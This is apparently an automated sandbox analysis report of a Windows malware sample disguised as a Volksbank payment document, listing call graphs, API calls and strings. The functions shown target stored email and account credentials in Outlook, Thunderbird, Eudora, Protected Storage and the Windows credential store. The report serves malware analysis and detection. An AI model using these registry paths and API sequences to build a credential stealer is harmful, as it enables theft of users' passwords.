33683->33884 33685 40370e 33685->33686 33687 403716 strchr 33685->33687 33686->33611 33687->33686 33688 403730 33687->33688 33885 4021b6 memset 33688->33885 33690 40373f _mbscpy _mbscpy strlen 33691 4037a4 _mbscpy 33690->33691 33692 403789 sprintf 33690->33692 33886 4023e5 16 API calls 33691->33886 33692->33691 33695 4085e2 33694->33695 33887 4082cd 11 API calls 33695->33887 33699 408600 33700 403cba 33699->33700 33701 40860b memset 33699->33701 33712 40821d 33700->33712 33890 410b62 RegEnumKeyExA 33701->33890 33703 4086d2 RegCloseKey 33703->33700 33705 408637 33705->33703 33706 40865c memset 33705->33706 33891 410a9c RegOpenKeyExA 33705->33891 33894 410b62 RegEnumKeyExA 33705->33894 33892 410add RegQueryValueExA 33706->33892 33709 408694 33893 40848b 10 API calls 33709->33893 33711 4086ab RegCloseKey 33711->33705 33895 410a9c RegOpenKeyExA 33712->33895 33714 40823f 33715 403cc6 33714->33715 33716 408246 memset 33714->33716 33724 4086e0 33715->33724 33896 410b62 RegEnumKeyExA 33716->33896 33718 4082bf RegCloseKey 33718->33715 33720 40826f 33720->33718 33897 410a9c RegOpenKeyExA 33720->33897 33898 4080ed 11 API calls 33720->33898 33899 410b62 RegEnumKeyExA 33720->33899 33723 4082a2 RegCloseKey 33723->33720 33900 4045db 33724->33900 33727 4088ef 33908 404656 33727->33908 33729 40872d 33729->33727 33732 408737 wcslen 33729->33732 33731 40872b CredEnumerateW 33731->33729 33732->33727 33738 40876a 33732->33738 33733 40877a wcsncmp 33733->33738 33735 404734 3 API calls 33735->33738 33736 404785 FreeLibrary 33736->33738 33737 408812 memset 33737->33738 33739 40883c memcpy wcschr 33737->33739 33738->33727 33738->33733 33738->33735 33738->33736 33738->33737 33738->33739 33740 4088c3 LocalFree 33738->33740 33911 40466b _mbscpy 33738->33911 33739->33738 33740->33738 33741 410a9c RegOpenKeyExA 33741->33624 33742->33628 33912 410a9c RegOpenKeyExA 33743->33912 33745 402c7a 33746 402da5 33745->33746 33747 402c87 memset 33745->33747 33746->33633 33913 410b62 RegEnumKeyExA 33747->33913 33749 402d9c RegCloseKey 33749->33746 33750 402cb2 33750->33749 33751 410b1e 3 API calls 33750->33751 33760 402d9a 33750->33760 33917 402bd1 40 API calls 33750->33917 33918 410b62 RegEnumKeyExA 33750->33918 33752 402ce4 memset sprintf 33751->33752 33914 410a9c RegOpenKeyExA 33752->33914 33754 402d28 33755 402d3a sprintf 33754->33755 33915 402bd1 40 API calls 33754->33915 33916 410a9c RegOpenKeyExA 33755->33916 33760->33749 33761->33636 33762->33640 33763->33644 33765 410816 33764->33765 33766 4107f1 FreeLibrary 33765->33766 33767 403ddd 33766->33767 33767->33649 33919 410a9c RegOpenKeyExA 33768->33919 33770 402ff9 33771 403006 memset 33770->33771 33772 40312c 33770->33772 33920 410b62 RegEnumKeyExA 33771->33920 33772->33653 33774 403122 RegCloseKey 33774->33772 33775 410b1e 3 API calls 33776 403058 memset sprintf 33775->33776 33921 410a9c RegOpenKeyExA 33776->33921 33778 403033 33778->33774 33778->33775 33779 4030a2 memset 33778->33779 33781 4030f9 RegCloseKey 33778->33781 33783 410b62 RegEnumKeyExA 33778->33783 33923 402db3 26 API calls 33778->33923 33922 410b62 RegEnumKeyExA 33779->33922 33781->33778 33783->33778 33785 4032d5 33784->33785 33786 4033a9 33784->33786 33924 4021b6 memset 33785->33924 33799 4034e4 memset memset 33786->33799 33788 4032e1 33925 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33788->33925 33790 4032ea 33791 4032f8 memset GetPrivateProfileSectionA 33790->33791 33926 4023e5 16 API calls 33790->33926 33791->33786 33796 40332f 33791->33796 33793 40339b strlen 33793->33786 33793->33796 33795 403350 strchr 33795->33796 33796->33786 33796->33793 33927 4021b6 memset 33796->33927 33928 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33796->33928 33929 4023e5 16 API calls 33796->33929 33800 410b1e 3 API calls 33799->33800 33801 40353f 33800->33801 33802 403546 _mbscpy 33801->33802 33806 40357f 33801->33806 33930 406d55 strlen _mbscat 33802->33930 33804 403565 _mbscat 33931 4033f0 19 API calls 33804->33931 33807 403985 33806->33807 33932 40466b _mbscpy 33807->33932 33811 4039aa 33813 4039ff 33811->33813 33933 40f460 memset memset 33811->33933 33954 40f6e2 33811->33954 33970 4038e8 21 API calls 33811->33970 33814 404785 FreeLibrary 33813->33814 33815 403a0b 33814->33815 33816 4037ca memset memset 33815->33816 33978 444551 memset 33816->33978 33819 4038e2 33819->33663 33882 40f334 334 API calls 33819->33882 33821 40382e 33822 406f06 2 API calls 33821->33822 33823 403843 33822->33823 33824 406f06 2 API calls 33823->33824 33825 403855 strchr 33824->33825 33826 403884 _mbscpy 33825->33826 33827 403897 strlen 33825->33827 33828 4038bf _mbscpy 33826->33828 33827->33828 33829 4038a4 sprintf 33827->33829 33990 4023e5 16 API calls 33828->33990 33829->33828 33832 44b090 33831->33832 33833 40fb10 RegOpenKeyExA 33832->33833 33834 403e7f 33833->33834 33835 40fb3b RegOpenKeyExA 33833->33835 33845 40f96c 33834->33845 33836 40fb55 RegQueryValueExA 33835->33836 33837 40fc2d RegCloseKey 33835->33837 33838 40fc23 RegCloseKey 33836->33838 33839 40fb84 33836->33839 33837->33834 33838->33837 33840 404734 3 API calls 33839->33840 33841 40fb91 33840->33841 33841->33838 33842 40fc19 LocalFree 33841->33842 33843 40fbdd memcpy memcpy 33841->33843 33842->33838 33995 40f802 11 API calls 33843->33995 33846 4070ae GetVersionExA 33845->33846 33847 40f98d 33846->33847 33848 4045db 7 API calls 33847->33848 33852 40f9a9 33848->33852 33849 40fae6 33850 404656 FreeLibrary 33849->33850 33851 403e85 33850->33851 33857 4442ea memset 33851->33857 33852->33849 33853 40fa13 memset WideCharToMultiByte 33852->33853 33853->33852 33854 40fa43 _strnicmp 33853->33854 33854->33852 33855 40fa5b WideCharToMultiByte 33854->33855 33855->33852 33856 40fa88 WideCharToMultiByte 33855->33856 33856->33852 33858 410dbb 9 API calls 33857->33858 33859 444329 33858->33859 33996 40759e strlen strlen 33859->33996 33864 410dbb 9 API calls 33865 444350 33864->33865 33866 40759e 3 API calls 33865->33866 33867 44435a 33866->33867 33868 444212 65 API calls 33867->33868 33869 444366 memset memset 33868->33869 33870 410b1e 3 API calls 33869->33870 33871 4443b9 ExpandEnvironmentStringsA strlen 33870->33871 33872 4443f4 _strcmpi 33871->33872 33873 4443e5 33871->33873 33874 403e91 33872->33874 33875 44440c 33872->33875 33873->33872 33874->33450 33876 444212 65 API calls 33875->33876 33876->33874 33877->33625 33878->33629 33879->33637 33880->33641 33881->33645 33882->33663 33883->33665 33884->33685 33885->33690 33886->33686 33888 40841c 33887->33888 33889 410a9c RegOpenKeyExA 33888->33889 33889->33699 33890->33705 33891->33705 33892->33709 33893->33711 33894->33705 33895->33714 33896->33720 33897->33720 33898->33723 33899->33720 33901 404656 FreeLibrary 33900->33901 33902 4045e3 LoadLibraryA 33901->33902 33903 404651 33902->33903 33904 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33902->33904 33903->33727 33903->33729 33903->33731 33905 40463d 33904->33905 33906 404643 33905->33906 33907 404656 FreeLibrary 33905->33907 33906->33903 33907->33903 33909 403cd2 33908->33909 33910 40465c FreeLibrary 33908->33910 33909->33741 33910->33909 33911->33738 33912->33745 33913->33750 33914->33754 33915->33755 33916->33750 33917->33750 33918->33750 33919->33770 33920->33778 33921->33778 33922->33778 33923->33778 33924->33788 33925->33790 33926->33791 33927->33795 33928->33796 33929->33796 33930->33804 33931->33806 33932->33811 33971 4078ba 33933->33971 33936 4078ba _mbsnbcat 33937 40f5a3 RegOpenKeyExA 33936->33937 33938 40f5c3 RegQueryValueExA 33937->33938 33939 40f6d9 33937->33939 33940 40f6d0 RegCloseKey 33938->33940 33941 40f5f0 33938->33941 33939->33811 33940->33939 33941->33940 33942 40f675 33941->33942 33975 40466b _mbscpy 33941->33975 33942->33940 33976 4012ee strlen 33942->33976 33944 40f611 33946 404734 3 API calls 33944->33946 33951 40f616 33946->33951 33947 40f69e RegQueryValueExA 33947->33940 33948 40f6c1 33947->33948 33948->33940 33949 40f66a 33950 404785 FreeLibrary 33949->33950 33950->33942 33951->33949 33952 40f661 LocalFree 33951->33952 33953 40f645 memcpy 33951->33953 33952->33949 33953->33952 33977 40466b _mbscpy 33954->33977 33956 40f6fa 33957 4045db 7 API calls 33956->33957 33958 40f708 33957->33958 33959 404734 3 API calls 33958->33959 33964 40f7e2 33958->33964 33965 40f715 33959->33965 33960 404656 FreeLibrary 33961 40f7f1 33960->33961 33962 404785 FreeLibrary 33961->33962 33963 40f7fc 33962->33963 33963->33811 33964->33960 33965->33964 33966 40f797 WideCharToMultiByte 33965->33966 33967 40f7b8 strlen 33966->33967 33968 40f7d9 LocalFree 33966->33968 33967->33968 33969 40f7c8 _mbscpy 33967->33969 33968->33964 33969->33968 33970->33811 33972 4078e6 33971->33972 33973 4078c7 _mbsnbcat 33972->33973 33974 4078ea 33972->33974 33973->33972 33974->33936 33975->33944 33976->33947 33977->33956 33991 410a9c RegOpenKeyExA 33978->33991 33980 44458b 33981 40381a 33980->33981 33992 410add RegQueryValueExA 33980->33992 33981->33819 33989 4021b6 memset 33981->33989 33983 4445a4 33984 4445dc RegCloseKey 33983->33984 33993 410add RegQueryValueExA 33983->33993 33984->33981 33986 4445c1 33986->33984 33994 444879 30 API calls 33986->33994 33988 4445da 33988->33984 33989->33821 33990->33819 33991->33980 33992->33983 33993->33986 33994->33988 33995->33842 33997 4075c9 33996->33997 33998 4075bb _mbscat 33996->33998 33999 444212 33997->33999 33998->33997 34016 407e9d 33999->34016 34002 44424d 34003 444274 34002->34003 34004 444258 34002->34004 34024 407ef8 34002->34024 34005 407e9d 9 API calls 34003->34005 34037 444196 52 API calls 34004->34037 34012 4442a0 34005->34012 34007 407ef8 9 API calls 34007->34012 34008 4442ce 34034 407f90 34008->34034 34012->34007 34012->34008 34014 444212 65 API calls 34012->34014 34038 407e62 strcmp strcmp 34012->34038 34013 407f90 FindClose 34015 4442e4 34013->34015 34014->34012 34015->33864 34017 407f90 FindClose 34016->34017 34018 407eaa 34017->34018 34019 406f06 2 API calls 34018->34019 34020 407ebd strlen strlen 34019->34020 34021 407ee1 34020->34021 34023 407eea 34020->34023 34039 4070e3 strlen _mbscat _mbscpy _mbscat 34021->34039 34023->34002 34025 407f03 FindFirstFileA 34024->34025 34026 407f24 FindNextFileA 34024->34026 34027 407f3f 34025->34027 34028 407f46 strlen strlen 34026->34028 34029 407f3a 34026->34029 34027->34028 34031 407f7f 34027->34031 34028->34031 34032 407f76 34028->34032 34030 407f90 FindClose 34029->34030 34030->34027 34031->34002 34040 4070e3 strlen _mbscat _mbscpy _mbscat 34032->34040 34035 407fa3 34034->34035 34036 407f99 FindClose 34034->34036 34035->34013 34036->34035 34037->34002 34038->34012 34039->34023 34040->34031 34041->33464 34042->33468 34043->33474 34044->33475 34045->33481 34046->33478 34047->33473 34391 43ffc8 18 API calls 34206 4281cc 15 API calls 34393 4383cc 110 API calls 34207 4275d3 41 API calls 34394 4153d3 22 API calls 34208 444dd7 _XcptFilter 34399 4013de 15 API calls 34401 425115 111 API calls 34402 43f7db 18 API calls 34405 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34210 4335ee 16 API calls 34407 429fef 11 API calls 34211 444deb _exit _c_exit 34408 40bbf0 138 API calls 34214 425115 79 API calls 34412 437ffa 22 API calls 34218 4021ff 14 API calls 34219 43f5fc 149 API calls 34413 40e381 9 API calls 34221 405983 40 API calls 34222 42b186 27 API calls 34223 427d86 76 API calls 34224 403585 20 API calls 34226 42e58e 18 API calls 34229 425115 75 API calls 34231 401592 8 API calls 33131 410b92 33134 410a6b 33131->33134 33133 410bb2 33135 410a77 33134->33135 33136 410a89 GetPrivateProfileIntA 33134->33136 33139 410983 memset _itoa WritePrivateProfileStringA 33135->33139 33136->33133 33138 410a84 33138->33133 33139->33138 34417 434395 16 API calls 34233 441d9c memcmp 34419 43f79b 119 API calls 34234 40c599 43 API calls 34420 426741 87 API calls 34238 4401a6 21 API calls 34240 426da6 memcpy memset memset memcpy 34241 4335a5 15 API calls 34243 4299ab memset memset memcpy memset memset 34244 40b1ab 8 API calls 34425 425115 76 API calls 34429 4113b2 18 API calls 34433 40a3b7 memset sprintf SendMessageA 34048 410bbc 34051 4109cf 34048->34051 34052 4109dc 34051->34052 34053 410a23 memset GetPrivateProfileStringA 34052->34053 34054 4109ea memset 34052->34054 34059 407646 strlen 34053->34059 34064 4075cd sprintf memcpy 34054->34064 34057 410a65 34058 410a0c WritePrivateProfileStringA 34058->34057 34060 40765a 34059->34060 34061 40765c 34059->34061 34060->34057 34062 4076a3 34061->34062 34065 40737c strtoul 34061->34065 34062->34057 34064->34058 34065->34061 34246 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                                          • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                                          Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 453 407f3f-407f44 451->453 454 407f46-407f74 strlen * 2 452->454 455 407f3a call 407f90 452->455 453->454 457 407f89-407f8f 453->457 458 407f83 454->458 459 407f76-407f81 call 4070e3 454->459 455->453 461 407f86-407f88 458->461 459->461 461->457
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                                          • String ID: ACD
                                                                                                                                                                                                                                          • API String ID: 379999529-620537770
                                                                                                                                                                                                                                          • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                                                                          Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                                          • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNELBASE(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                                          • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                                          • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                                                                          Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76940A60,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404AB8
                                                                                                                                                                                                                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404ADE
                                                                                                                                                                                                                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                                          • API String ID: 745651260-375988210
                                                                                                                                                                                                                                          • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                                                                          Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                                          • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                                          • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                                                                                                                                          • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
